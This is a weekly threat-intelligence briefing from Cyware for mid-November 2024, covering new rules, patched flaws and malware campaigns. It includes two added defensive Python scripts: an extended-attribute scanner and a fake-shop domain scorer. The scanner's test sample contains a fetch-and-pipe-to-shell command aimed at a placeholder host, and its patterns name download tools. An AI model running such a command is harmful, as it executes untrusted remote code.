Cyware Weekly Threat Intelligence - November 11–15

Weekly Threat Briefing Nov 15, 2024

The Good

As cyber threats to critical infrastructure surge, the TSA has proposed formal rules for pipeline and railroad operators, while the World Economic Forum introduced a new framework to enhance public-private collaboration against cybercrime. These efforts highlight the urgency of uniting resources and governance to fortify cybersecurity resilience on all fronts.

  • The Transportation Security Administration (TSA) has proposed new rules that would formalize its existing security directives for pipeline and railroad operators in response to cyber threats. The rules would require operators to report cyber incidents and to create cyber risk management plans overseen by TSA, at an estimated cost to operators of $2.1 billion over 10 years. TSA's stated aim is to raise the cybersecurity resilience of critical transportation infrastructure as threats to it, attributed in part to nation-state actors, continue to grow. The proposed rules are open for industry comment until February 5, reflecting TSA's attempt to balance flexibility for operators against the evolving threat.
  • Italy conducted the annual Blueprint Operational Level Exercise (Blue OLEx) to test EU institutions' readiness for cyber-attacks. The exercise involved senior cybersecurity officials from EU member states and the Commission, focusing on improving responses to incidents and crises. Blue OLEx emphasized executive-level cooperation through the Cyber Crisis Liaison Organization Network (EU-CyCLONe), established by the NIS2 Directive. The event was hosted by the Italian Cybersecurity Agency (ACN), emphasizing the importance of sharing ideas and strengthening ties among crisis management leaders.
  • The World Economic Forum's Partnership against Cybercrime released a framework to enhance collaboration between the cybersecurity industry and the public sector. The framework emphasizes the need for incentives, good governance, and resources to support operational collaborations. It highlights the importance of clear missions, impact, peer-to-peer learning, and public recognition as incentives for organizations to collaborate. Additionally, it emphasizes the need for flexible governance frameworks, membership capability assessments, and data normalization to ensure a cohesive response to cyber threats.

The Bad

From Microsoft's patching of critical flaws to nation-state campaigns, the week offered no respite. The WIRTE group expanded into disruptive attacks across the Middle East, while TA455 targeted aerospace firms with fake job lures. Microsoft's November 2024 Patch Tuesday release addressed 89 vulnerabilities, including two actively exploited zero-days, underscoring the pressure on global IT systems.

  • CYFIRMA analyzed SpyNote, an Android malware that gives its operators extensive control over infected devices. The analyzed sample disguises itself as a fake Avast Mobile Security for Android app to deceive users. Once installed, it targets cryptocurrency holdings, steals data from other apps, harvests user credentials, and monitors network activity, connecting to a C2 server to exfiltrate what it collects. Over 10,000 SpyNote samples have been identified, with recent infections linked to the threat actor EVLF, who distributes the malware through platforms such as Telegram.
  • The Iranian Dream Job campaign conducted by TA455 targeted the aerospace industry by offering fake jobs and distributing the SnailResin malware. The campaign has been active since at least September 2023 and uses fake recruiting websites and LinkedIn profiles to distribute malicious files. The attackers use a detailed PDF guide to encourage victims to download a ZIP file containing the malware. The campaign is suspected to be involved in espionage targeting aerospace, aviation, and defense industries in Middle Eastern countries.
  • Microsoft released fixes for 89 CVE-listed security flaws in its products, two of which are zero-days already under active attack. The first, CVE-2024-49039, is a privilege escalation in Windows Task Scheduler; the second, CVE-2024-43451, is a spoofing flaw that discloses a user's NTLMv2 hash to an attacker. Azure CycleCloud users should be aware of CVE-2024-43602, which permits remote code execution. Two further critical bugs round out the release: CVE-2024-43498, a remote code execution flaw in .NET and Visual Studio, and CVE-2024-43639, a remote code execution flaw rooted in a cryptographic protocol weakness in Windows Kerberos.
  • The Google Chrome team has released Chrome 131 for Windows, Mac, and Linux. The release carries 12 security fixes, several of them for bugs reported by external researchers, covering inappropriate implementations in Blink, Autofill, Media, Accessibility, Views, Navigation, Paint, and FileSystem. Internal security work contributed a further set of fixes.
  • The WIRTE APT group, associated with the Hamas-affiliated group Gaza Cybergang, has continued its attacks in the Middle East. It has expanded its focus from espionage to disruptive attacks while targeting entities in the Palestinian Authority, Jordan, Iraq, Egypt, and Saudi Arabia. Researchers uncovered a connection between the malware used by WIRTE and SameCoin, a wiper malware that attacked Israeli targets in 2024. The APT group has also included hack-and-leak operations and is using cyber capabilities to shape narratives.
  • The CISA issued a warning about two new vulnerabilities in the Palo Alto Networks Expedition software, which are being actively exploited. They have been added to the KEV catalog. The vulnerabilities are OS Command Injection (CVE-2024-9463) and SQL Injection (CVE-2024-9465), which can allow unauthorized access to run commands as root or expose database contents, potentially revealing sensitive information like usernames, passwords, configurations, and keys. Palo Alto Networks addressed these in an update on October 9.

New Threats

This week, several emerging threats highlighted the diversity of attack tactics. The new Glove Stealer bypasses browser cookie encryption to pilfer cookies and crypto wallets, while the Lazarus group's RustyAttr trojan targets macOS users with an application built on the Tauri framework. A Chinese threat actor, SilkSpecter, was found scamming online shoppers through 4,695 fake domains that impersonate popular brands to steal credit card details from Black Friday bargain hunters.

  • Researchers have discovered a tool, GoIssue, that can steal developer credentials in bulk and conduct malicious activities, including supply chain attacks. GoIssue gathers email addresses from public GitHub profiles by using automated processes and GitHub tokens, allowing attackers to send bulk emails directly to user inboxes. The tool is being marketed to potential attackers for $700 for a custom build or $3,000 for full source code access. It combines bulk email capabilities with data collection features and hides the attacker's identity through proxy networks.
  • The new Glove Stealer malware was found to bypass Google Chrome's Application-Bound encryption to steal browser cookies. The malware is simple and lacks protection mechanisms, suggesting it is in the early stages of development. The threat actors behind the malware use social engineering tactics to trick victims into installing it. The malware can extract cookies from Firefox and Chromium-based browsers, as well as steal cryptocurrency wallets, 2FA tokens, passwords, and emails. 
  • APT41, a threat group from China, is using a sophisticated Windows-based surveillance toolkit in a cyberespionage campaign targeting organizations in South Asia. The toolkit, called DeepData Framework, consists of 12 separate plugins optimized for malicious functions. These plugins steal communications from various messaging apps, system information, browsing history, cookies, passwords, audio files, and more.
  • Threat actors are using a new technique on macOS to deliver a malware called RustyAttr, which has been linked to North Korea's Lazarus Group. The malicious application is built with the Tauri framework, and its shell-script payload is not stored in the executable but in an extended attribute (xattr) of the file, where most static scanners and casual inspection do not look. When the app runs, its web view loads a fake webpage whose JavaScript calls the app's Rust backend; the backend reads the script out of the extended attribute and executes it while a decoy document or message is displayed to the victim.
  • Unit 42 researchers identified a cluster of North Korean IT workers, tracked as CL-STA-0237, that took part in phishing attacks using malware-laced video conferencing apps and operated primarily from Laos. The cluster abused a U.S.-based IT services company to apply for jobs and succeeded in getting hired by a major tech company in 2022. Newly registered domains tied to an IP address already associated with the MiroTalk fake job campaign led the researchers to conclude that CL-STA-0237 had exploited information from, and controlled multiple accounts belonging to, the U.S.-based IT company.
  • A Chinese threat actor named SilkSpecter is running a scam using fake online stores to steal credit card information from shoppers in the U.S. and Europe. SilkSpecter operates 4,695 fake domains impersonating popular brands like North Face, Lidl, and Ikea. The scam uses domain names containing "Black Friday" to target bargain hunters. Sites adjust language based on location using Google Translate. They use legitimate payment processor Stripe to appear trustworthy while stealing card details. SilkSpecter tracks visitors' behavior with tools like OpenReplay and uses phishing kits to steal card information. The scam may use stolen phone numbers for two-factor authentication in future attacks.
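The RustyAttr item above describes a payload hidden in an extended attribute rather than in the binary itself. The following scanner is an added example, not code from the Cyware briefing or from the researchers who analyzed RustyAttr. It is a hypothetical triage check: it reports attributes whose names fall outside an assumed allow-list of common macOS metadata attributes, and flags any attribute whose value looks like a script (shebang, shell interpreters, download-and-pipe idioms) regardless of its name. The allow-list, the attribute name `test`, and the sample records are constructed for illustration.

```python
"""Flag files whose extended attributes carry script-like payloads.

Added example for the RustyAttr technique (not the original research's code).
The analysis functions take (path, attribute name, value) records so they can be
fed from any collector; collect_xattrs() uses os.listxattr where CPython
provides it (Linux/FreeBSD). On macOS, parse `xattr -l <file>` into records.
"""
import os
import re
from typing import Iterator, List, Tuple

# Attribute names macOS itself commonly sets (assumed allow-list; extend it
# for your fleet). Anything else is reported with the reason "unusual-name".
KNOWN_BENIGN = {
    "com.apple.quarantine",
    "com.apple.metadata:kMDItemWhereFroms",
    "com.apple.FinderInfo",
    "com.apple.ResourceFork",
    "com.apple.lastuseddate#PS",
    "com.apple.provenance",
}

# Heuristics for a script hidden in an attribute value: a shebang at the start,
# common shell interpreters or download tools, or a download-and-pipe idiom.
SCRIPT_MARKERS = re.compile(
    rb"^#!|\b(?:curl|wget|osascript|bash|zsh|sh)\b|\$\(|\|\s*(?:ba|z)?sh\b"
)
MAX_BENIGN_SIZE = 4096  # assumption: metadata attributes are small


def classify_xattr(name: str, value: bytes) -> List[str]:
    """Return the reasons an attribute is suspicious (empty list if none)."""
    reasons = []
    if name not in KNOWN_BENIGN:
        reasons.append("unusual-name")
    if SCRIPT_MARKERS.search(value):
        reasons.append("script-like-value")
    if len(value) > MAX_BENIGN_SIZE:
        reasons.append("oversized")
    return reasons


def scan_records(records) -> List[Tuple[str, str, List[str]]]:
    """records: iterable of (path, attr_name, value). Returns the findings."""
    findings = []
    for path, name, value in records:
        reasons = classify_xattr(name, value)
        if reasons:
            findings.append((path, name, reasons))
    return findings


def collect_xattrs(root: str) -> Iterator[Tuple[str, str, bytes]]:
    """Walk `root` and yield (path, name, value) for every extended attribute.

    Yields nothing on platforms where CPython has no os.listxattr.
    """
    if not hasattr(os, "listxattr"):
        return
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                names = os.listxattr(path, follow_symlinks=False)
            except OSError:
                continue
            for name in names:
                try:
                    yield path, name, os.getxattr(path, name, follow_symlinks=False)
                except OSError:
                    continue


# Constructed sample: a normal quarantine flag, an executable carrying a
# shell script in an attribute named "test", and an icon with Finder metadata.
SAMPLE = [
    ("/Applications/Decoy.app/Contents/MacOS/Decoy",
     "com.apple.quarantine", b"0083;6730a1b2;Safari;"),
    ("/Applications/Decoy.app/Contents/MacOS/Decoy",
     "test", b"#!/bin/sh\ncurl -s http://example.invalid/stage2 | sh\n"),
    ("/Applications/Decoy.app/Contents/Resources/icon.icns",
     "com.apple.FinderInfo", b"\x00" * 32),
]

if __name__ == "__main__":
    for path, name, reasons in scan_records(SAMPLE):
        print(f"{path}: xattr '{name}' -> {', '.join(reasons)}")
```

On a live macOS host the same check can be approximated at the shell with `xattr -l` on the files under an application bundle; the point of the Python version is that the decision logic is separated from collection, so it can be run over records exported from endpoints that the analyst cannot log into directly.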

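The SilkSpecter item above describes a recognizable naming pattern: a well-known brand name combined with a seasonal lure such as "Black Friday" on a domain the brand does not own. The scorer below is an added example, not code from the Cyware briefing or from the researchers who tracked the campaign. It assumes a small brand-to-official-apex mapping and a short list of multi-label public suffixes, both constructed for illustration and not authoritative; the candidate hostnames are likewise constructed. A real deployment would source the brand list from the organizations being protected and use a proper public-suffix library.

```python
"""Score hostnames for the brand-plus-seasonal-lure pattern of fake shops.

Added example (not the original research's code). Flags a host when a
protected brand's name appears in its registrable label but the registrable
domain is not one of the brand's official apexes, and separately when a
seasonal lure keyword appears; both together are reported as the pattern.
"""
import re
from typing import Dict, List, Set

# Assumed brand -> official apex domains (illustrative, not authoritative).
OFFICIAL: Dict[str, Set[str]] = {
    "northface": {"thenorthface.com"},
    "lidl": {"lidl.com", "lidl.de", "lidl.co.uk"},
    "ikea": {"ikea.com"},
}

# Seasonal lure keywords seen in shopping scams (assumption; order matters
# only for which keyword is reported first).
SEASONAL = ("blackfriday", "cybermonday", "outlet", "deals", "sale")

# Minimal set of two-label public suffixes handled here (assumption; a real
# tool should use the Public Suffix List).
MULTI_SUFFIX = {"co.uk", "com.au", "co.jp"}


def registrable(host: str) -> str:
    """Return the registrable domain, e.g. shop.lidl.co.uk -> lidl.co.uk."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_SUFFIX:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def normalize(label: str) -> str:
    """Strip hyphens and digits so 'north-face-2024' compares as 'northface'."""
    return re.sub(r"[^a-z]", "", label.lower())


def score_domain(host: str) -> List[str]:
    """Return the reasons a host looks like a fake shop (empty if none)."""
    apex = registrable(host)
    sld = normalize(apex.split(".")[0])
    reasons: List[str] = []
    for brand, official in OFFICIAL.items():
        if brand in sld and apex not in official:
            reasons.append(f"brand:{brand}")
            break
    for kw in SEASONAL:
        if kw in sld:
            reasons.append(f"lure:{kw}")
            break
    has_brand = any(r.startswith("brand:") for r in reasons)
    has_lure = any(r.startswith("lure:") for r in reasons)
    if has_brand and has_lure:
        reasons.append("fake-shop-pattern")
    return reasons


def triage(hosts) -> Dict[str, List[str]]:
    """Score a list of hosts and return only those with findings."""
    return {h: r for h in hosts if (r := score_domain(h))}


# Constructed candidates: two official hosts, three lookalikes, one unrelated.
CANDIDATES = [
    "www.thenorthface.com",
    "shop.lidl.co.uk",
    "northface-blackfriday-shop.com",
    "lidl-deals-2024.net",
    "ikea-outlet.shop",
    "example.org",
]

if __name__ == "__main__":
    for host, reasons in triage(CANDIDATES).items():
        print(f"{host}: {', '.join(reasons)}")
```

The keyword check is deliberately crude and will match words such as "wholesale" on "sale"; in practice the brand-in-domain test carries the weight, and the lure keyword serves to prioritize among many lookalikes rather than to classify on its own.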
Related Threat Briefings

Dec 20, 2024

Cyware Weekly Threat Intelligence, December 16–20, 2024

In a digital age where borders are blurred, governments are sharpening their strategies to outpace cyber adversaries. The draft update to the National Cyber Incident Response Plan (NCIRP) introduces a comprehensive framework for managing nationwide cyberattacks that impact critical infrastructure and the economy. Meanwhile, the fiscal year 2025 defense policy bill, recently approved by the Senate, emphasizes strengthening cybersecurity measures both at home and abroad. A deceptive health app on the Amazon Appstore turned out to be a Trojan horse for spyware. Masquerading as BMI CalculationVsn, the app recorded device screens, intercepted SMS messages, and scanned for installed apps to steal sensitive data. Malicious extensions targeting developers and cryptocurrency projects have infiltrated the VSCode marketplace and NPM. Disguised as productivity tools, these extensions employed downloader functionality to deliver obfuscated PowerShell payloads. The BADBOX botnet has resurfaced, compromising over 192,000 Android devices, including high-end smartphones and smart TVs, directly from the supply chain. Industrial control systems are facing heightened risks as malware like Ramnit and Chaya_003 targets engineering workstations from Mitsubishi and Siemens. Both malware families exploit legitimate services, complicating detection and mitigation efforts in ICS environments. The Chinese hacking group Winnti has been leveraging a PHP backdoor called Glutton, targeting organizations in China and the U.S. This modular ELF-based malware facilitates tailored attacks across industries and even embeds itself into software packages to compromise other cybercriminals. A tax-themed phishing campaign, dubbed FLUX#CONSOLE, is deploying backdoor payloads to compromise systems in Pakistan. Threat actors employ phishing emails with double-extension files masquerading as PDFs.

Dec 13, 2024

Cyware Weekly Threat Intelligence, December 09–13, 2024

Cybercrime’s web of deception unraveled in South Korea as authorities dismantled a fraud network responsible for extorting $6.3 million through fake online trading platforms. Dubbed Operation Midas, the effort led to the arrest of 32 individuals and the seizure of 20 servers. In a significant move to combat surveillance abuses, the U.S. defense policy bill for 2025 introduced measures to shield military and diplomatic personnel from commercial spyware threats. The legislation calls for stringent cybersecurity standards, a review of spyware incidents, and regular reporting to Congress. The subtle art of deception found a new stage with a Microsoft Teams call, as attackers used social engineering to manipulate victims into granting remote access. By convincing users to install AnyDesk, they gained control of systems, executing commands to download the DarkGate malware. Russian APT Secret Blizzard has resurfaced and used the Amadey bot to infiltrate Ukrainian military devices and deploy their Tavdig backdoor. In a phishing spree dubbed "Aggressive Inventory Zombies (AIZ)," scammers impersonated brands like Etsy, Amazon, and Binance to target retail and crypto audiences. Surveillance has reached unsettling new depths with the discovery of BoneSpy and PlainGnome, two spyware families linked to the Russian group Gamaredon. Designed for extensive espionage, these Android malware tools track GPS, capture audio, and harvest data. A new Android banking trojan has already caused havoc among Indian users, masquerading as utility and banking apps to steal sensitive financial information. With 419 devices compromised, the malware intercepts SMS messages, exfiltrates personal data via Supabase, and even tricks victims into entering details under the pretense of bill payment. Iranian threat actors have set their sights on critical infrastructure, deploying IOCONTROL malware to infiltrate IoT and OT/SCADA systems in Israel and the U.S.

Dec 6, 2024

Cyware Weekly Threat Intelligence, December 02–06, 2024

NIST sharpened the tools for organizations to measure their cybersecurity readiness, addressing both technical and leadership challenges. The two-volume guidance blends data-driven assessments with managerial insights, emphasizing the critical role of leadership in applying findings. The Manson Market, a notorious hub for phishing networks, fell in a sweeping Europol-led takedown. With over 50 servers seized and 200TB of stolen data recovered, the operation spanned multiple countries, including Germany and Austria. Russian APT group BlueAlpha leveraged Cloudflare Tunnels to cloak its GammaDrop malware campaign from prying eyes. The group deployed HTML smuggling and DNS fast-fluxing to bypass detection, targeting Ukrainian organizations with precision. Earth Minotaur intensified its surveillance operations against Tibetan and Uyghur communities through the MOONSHINE exploit kit. The kit, now updated with newer exploits, enables the installation of the DarkNimbus backdoor on Android and Windows devices. Cloudflare Pages became an unwitting ally in the sharp rise of phishing campaigns, with a staggering 198% increase in abuse cases. Cybercriminals exploited the platform's infrastructure to host malicious pages, fueling a surge from 460 incidents in 2023 to over 1,370 by October 2024. DroidBot has quietly infiltrated over 77 cryptocurrency exchanges and banking apps, building a web of theft across Europe. Active since June 2024, this Android malware operates as a MaaS platform, enabling affiliates to tailor attacks. Rockstar 2FA, a phishing platform targeting Microsoft 365 users, has set the stage for large-scale credential theft. With over 5,000 phishing domains launched, the platform is marketed on Telegram. The Gafgyt malware is shifting gears, targeting exposed Docker Remote API servers through legitimate Docker images, creating botnets capable of launching DDoS attacks.